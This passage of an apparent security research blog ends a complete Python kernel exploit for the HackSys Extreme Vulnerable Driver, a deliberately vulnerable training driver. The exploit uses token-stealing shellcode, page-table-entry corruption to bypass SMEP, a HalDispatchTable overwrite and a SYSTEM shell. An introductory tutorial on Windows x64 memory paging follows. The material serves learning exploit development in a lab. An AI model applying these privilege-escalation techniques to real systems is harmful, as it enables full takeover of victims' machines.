class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)
    ]

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)
    ]

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)
    ]

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)
    ]

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)
    ]

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)
    ]

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)
    ]

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)
    ]


# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

"""
Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!
)
"""

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to stores PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisy c_void_p type from strucutre.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM x 2!

Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP all together and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note - some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00

Introduction

0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscured 8 bytes we stumble across so copiously.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of “resource sharing”. For example, if we have two instances of the calc.exe - these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understanding WHAT paging actually does, let’s take a look a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode are we using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to the 31st bit of the CR0 register. If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing the 31st bit of the CR0 bit is set to 1.

We now know that paging is enabled based on the image above - but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging is another way of saying that Physical Address Extension, or PAE, is enabled. PAE enables 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

The 5th bit of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 8 bits of a virtual address (47-39, 38-30, 29-21, 20-12, 11-0) are actually just indexes of various paging structure tables.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line.This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you) - let’s circle back to bits 63-48, which are represented as “Sign Extend

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). The MMU would not be able to keep track of all of this from a translations perspective firstly (efficiently), and secondly (and most importantly) systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-47 are sign extended is known as a canonical address.

Sign extending bits 63-47 limits the virtual address space to 256 TB of RAM. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-47 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of contention, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which actually serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actually physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, The PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset to a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the PT in this case, to another location). Bits 11-0 simply serve as the actual distance from the page table base to the actual location of the physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to notate before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDTE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

The PFN, as we can see from the output in WinDbg in the earlier screenshot, that PML4 is using to index the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s breakdown this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000 - which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!

Awesome, we know know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs - For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

